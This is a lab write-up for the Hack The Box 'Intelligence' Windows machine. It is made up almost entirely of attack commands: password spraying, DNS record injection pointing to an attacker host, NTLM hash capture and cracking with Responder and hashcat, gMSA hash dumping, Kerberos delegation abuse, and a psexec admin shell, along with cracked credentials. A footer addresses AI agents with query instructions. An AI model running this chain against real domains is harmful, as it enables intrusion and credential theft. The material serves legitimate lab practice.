# Foothold

```bash
#!/bin/bash
for month in {01..12}; do
    for day in {01..31}; do
        wget http://10.10.10.248/documents/2020-$month-$day-upload.pdf
    done
done

exiftool 2020-* | grep -i creator | awk -F: '{print $2}' | sed 's/^[ \t]*//' | sort -u > users.txt
```

```bash
for i in $(ls 2020-*); do open $i; done
```

<figure><img src="/files/FzfUO5Yigd6RT7GVnhzh" alt=""><figcaption></figcaption></figure>

```
NewIntelligenceCorpUser9876
```

```
netexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876 --continue-on-success
```

<figure><img src="/files/wsin8XYtxiwjzhXpWoVb" alt=""><figcaption></figcaption></figure>

```
Tiffany.Molina:NewIntelligenceCorpUser9876
```

```
netexec smb 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 --shares
```

<figure><img src="/files/CGgknYzaSvx2jOLF6dov" alt=""><figcaption></figcaption></figure>

```
adot@kali:~/oscp/htb/windows/intelligence$ smbclient "\\\\10.10.10.248\\Users" -U  Tiffany.Molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Apr 18 20:20:26 2021
  ..                                 DR        0  Sun Apr 18 20:20:26 2021
  Administrator                       D        0  Sun Apr 18 19:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 02:21:46 2018
  Default                           DHR        0  Sun Apr 18 21:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 02:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 02:11:27 2018
  Public                             DR        0  Sun Apr 18 19:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 20:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 19:51:46 2021

		3770367 blocks of size 4096. 1418574 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
```

```
$ smbclient "\\\\10.10.10.248\\IT" -U  Tiffany.Molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr 18 19:50:55 2021
  ..                                  D        0  Sun Apr 18 19:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 19:50:55 2021

		3770367 blocks of size 4096. 1419262 blocks available
smb: \> mget downdetector.ps1 
Get file downdetector.ps1? y
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (5.1 KiloBytes/sec) (average 5.1 KiloBytes/sec)
smb: \> exit
```

```powershell
��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

```

```
Ted.Graves
```

```
bloodhound-python -d intelligence.htb -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -ns 10.10.10.248 -c all
```

Add a dns A record

```
python dnstool.py -u 'intelligence.htb\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webad0t8.intelligence.htb -a add -t A -d 10.10.14.6 10.10.10.248
```

<figure><img src="/files/bYqW3tdzI1BkissiFml7" alt=""><figcaption></figcaption></figure>

{% hint style="success" %}
Got a call back
{% endhint %}

<figure><img src="/files/GH3xrgmAx16ziCgRgliI" alt=""><figcaption></figcaption></figure>

```
sudo responder -I tun0
```

<figure><img src="/files/QikXrBM4ndnyTrsLG0TO" alt=""><figcaption></figcaption></figure>

```
hashcat -m 5600 ted.hash ~/rockyou.txt -O
```

<figure><img src="/files/m86P7Pl8aZJLeQqk1aOP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/aMEEJmyrGt517UPoJh7w" alt=""><figcaption></figcaption></figure>

```
python gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
```

<figure><img src="/files/xz1qbuanGfWdhvqyDJ0t" alt=""><figcaption></figcaption></figure>

```
netexec smb 10.10.10.248 -u svc_int$ -H 51e4932f13712047027300f869d07ab6
```

<figure><img src="/files/kiW4QDTJ94vSNAhZuFOo" alt=""><figcaption></figcaption></figure>

```
impacket-getST -spn http/dc.intelligence.htb -impersonate Administrator -u intelligence/svc_int$ -hashes 51e4932f13712047027300f869d07ab6:51e4932f13712047027300f869d07ab6
```

<figure><img src="/files/EyT0WL19DhaxePW6yOYR" alt=""><figcaption></figcaption></figure>

```
etST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes 51e4932f13712047027300f869d07ab6:51e4932f13712047027300f869d07ab6
```

<figure><img src="/files/U2FaFXsTrRepQRfvO5JQ" alt=""><figcaption></figcaption></figure>

```
export KRB5CCNAME=$(pwd)/Administrator.ccache 
impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
```

<figure><img src="/files/0ZGRVKJTs51L0LPj1LHk" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://htb.adot8.com/hack-the-box/oscp-like-boxes/windows/intelligence/foothold.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.